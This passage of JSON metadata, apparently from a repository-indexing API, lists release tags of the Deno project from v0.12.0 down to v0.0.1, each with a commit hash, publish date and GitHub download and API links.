"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17